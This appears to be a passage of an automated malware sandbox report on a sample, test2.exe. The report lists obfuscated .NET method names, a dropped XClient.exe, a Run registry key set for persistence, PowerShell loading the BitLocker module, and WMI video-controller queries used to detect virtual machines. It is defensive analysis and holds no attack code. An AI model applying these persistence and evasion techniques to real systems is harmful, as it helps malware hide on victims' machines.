              Source: test.3.dr, AfQodiI2ksos9cbeP4eHGAs8tPh64J5dtok9uZ4lf3uTKe0pb7bqJ0bXYUQSLTQNr631C.csHigh entropy of concatenated method names: 'N63qDT29evOtRxAgGebUumTfKZYIg3bs5LMkyUJ3XDsPlbhe7PjAtxnMZVjYzIPzsxDHR', 'z3tuRhuzsGsxQPd9lSMpvNqzmf9eOT11tQapDWOuvLl4XbWKRzHsXDRZCQLBPvoZch5Tb', 'bPdAiaQG7XZLrK1qZxI55S0mHyN7Jl5yHpaIoqTrLncZPpVx4pPGDVkeYB4hY6eD3lHzT', 'Wm5DGTxuGPLAc7hXlxdiXCYOGRhbGDiZGNtoQlGCeGMLgiCnRLOai9TGhbC6GxPDxkysU', 'pARUIDgQFtsdy7Bd5rMWSBg7pk3lgbQv9fHzewulxk9FX228t3dUc5gu0cS7zkYLguOkJ', 'vXtwdxl0ursQb97NsSt0qDTucOPQ3s21KcyuhY2EswRj6SaBYUXPRVpYgPSUOGrFGhx6H', 'OVLfpKCG9BnjSeiFZHpEiGc0orPyVStCe22chCWbdcveBuFWXs3D1nv0gTLT1Sti8KhrR', '_5LvvLySjBoGaHErFgiQmLpbmHdIm65GbpvP9v5AnEMoiOt2s3y3ReIzQuGUjb5smGaFf0', 'wkbUm3CjkkdjvuPo60KA1VF5cpGAbX8SOUFZqLUcaDGCpN6kJ7EP8Yw', 'Z8sDz7heEJ0sxvAVRqxVcsDyweAf5nMqbLjdOelOEv3sQMZeIqwwaH5'
              Source: test.3.dr, cWbnhgR87wIUBxR6cj09ZIB9qg4ITwrjmhzPldn3d2CFxlXGOKk6uFEWsevbTUJTkeJcPvRm.csHigh entropy of concatenated method names: '_6avM53x2QohqoJhS7wBZ1CSbYvNTmCFV0G9TcIFqd2S9FBChcgJHx0czopFJsgOm09xO5uU1', 'c8CqnjF9qWD61lP2ipzb4Sm181oM80V7KZTBQ0y6qXaDkfmyEdJCbPlOypIM1gmN8II7X9E6', 'plZt2yx37I3HDMObL1fbpCzWTjfgVw51V0MkEMUKuubg7of4K5NlyzBQuNlaCJkGXeNyz4bR', 'eFpB8V10PIjkdZqZpQQlFYyWgEREpQLOGwn3RFEQK0u1XNDB1tB09oYOdkxUHFZ95dPYSrGY', 'KsNXLC8P2LwRBn1WHJ8TCQcKVPXMRMRe36SBCTxxItyGIFEW4MlajC64JSU8MZhhl5MEjQ9I', 'ISZ5bT0HFFdRP1DN19zxcgHV2P4EOPdcNhEn9PuBxnVymF2Qa986dSWdzEBhTzkk056PyCHB', 'PW9bRjhBeokYl6yz9Kk2SslUdXTseVoD7Vxe4hvkkedAVdjOpYBfd1rzOa5x5JGJPJK7Umzj', 'D6jwhLRyRyuQE2kdHOLAaG3JAKB1zQ428yyY92OHHaPvBnwOagycvjdaHFWXIFHMBH1KHQ0C', 'vc5eaqbULMrxriBeLuoTVUFeHgpqjuyUIaXdozP3HbzaXNvFIc3Kv5QOvrcCBnDD8Q9yuZKC', 'fi9xL1d5NcWF1GQwmIQGbvvDjY6O2CymMOTTmKPfi70KI6CSXuezd1ZaOU1C2uvsxGZ2WdWA'
              Source: test.3.dr, baAfO6eh57uwRmfnb9ZgPW9GNd4C97yj82jLx.csHigh entropy of concatenated method names: 'FBNWljJUfRUOQHV8w5kXnivtFfvihr87V8fij', 'N3N7JwtMFIURW87Zd2HVZbIbG2Q4tHwh7ikej', 'B1UsqK3BpYtoo55elNJEb53GS0C4BTaQIZ5tg', 'C3gBLcFNJkCIB1aPhj8TVcFd5wa1qnkOytGkR', 'BAGercQozNU5ll1', 'pRsXO6M11LhQJ3Z', 'Nq9kdMsCokUEqhC', 'd1u9xj5WdnTP5q4', 'ZbkiMGaXA1UyJwz', 'Q6h2sNWLeb5UmQd'
              Source: test.3.dr, g1kPeRidOFWh0Mq0MDiiGrVS0VQoWjR9LoOiyyxhvEYhDnS1Y9nkoDD.csHigh entropy of concatenated method names: 'VnAbJoODtKisVBy9SiAIENlKxEhUXgX5exiB0QuqHxt3MeL1rBy2ZHl', 'hJNjb4ACG8m4LfFcFRQjlBemGYSGdLPOEu7AYsUVsI7TepYX5Tkm4Ni', 'frdyR57Y6gjgHH6VYoE4cGWT18oMjkhMpPM7cmtLYYrpt7wbAjPlIBQ', 'F5xEhnU7hl63oMlEZHMcn6Z4CMCSXdu1JkErNy5VoL1c5MmezBZcNTd', 'knQWD1iJeZD4eh2UfLwfytZY6rKYONhSvAjwI1VBf1TTI8xso3fziEu', 'rlVmKVaYfaOVfbWEp6E4ycLl1rYNf1bPNFqIkwFcXFmjurhdWDVS6im', 'Zg7qxS2XBZEHkisBbnADmlyURQPPxnIoCknLJAvG6qTarGhqaBU6FvS', '_7FjPXkphe9XxFusoxlK3MnQKjdzdH35wPynMUWyVOZpzWXnDcZJ6GPj', 'oaqFOrYjheWUMIioTDwW7rlNwzqvkjyLfRtEhry6VtTmB6xuu4DnUlH', 'mTgs5zCxmvC3ex4IJ6KG98hIFiEmIrZ0ORzsxAt6gxuObw7gQGiQSDX'
              Source: test.3.dr, xuigMhegpDWb7LyFrukanLGTDbKK1mTJMDADPB9Vz5qijEgBZbzo72QwF7mNBkuarMQ9LipLOQXs5xBkPhs96tO.csHigh entropy of concatenated method names: 'fk5LEgK7V2M3Hd149MjNFpfBZMY7yDzfMnatgVqrXr4zOIYIMEuPC2meTY0zUtUnnhnWwc2PlydoWivaE2lUSNV', 'QdgYZBpeJQLNoNPSSSpUt0LD2lSaP3SuPdDmPNzFBNaIb5s', 'aPs5pNPwlUAmCT43hITfLsEFpH21qsblBeCsZhyHWyhyOzY', 'ZqNDMvGPRADzq7RjcJkjZlJ34C3ar2ptOVzBZgPJC7276VL', 'iFkpACBewAllh3bnBTSG0AtnPyVKhvaNVXyFYyIyFdqy923'
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile created: C:\Users\user\AppData\Local\Temp\testJump to dropped file
              Source: C:\Users\user\Desktop\test2.exe.bin.exeFile created: C:\Users\user\AppData\Local\Temp\XClient.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile created: C:\Users\user\AppData\Local\Temp\testJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run testJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run testJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\test2.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
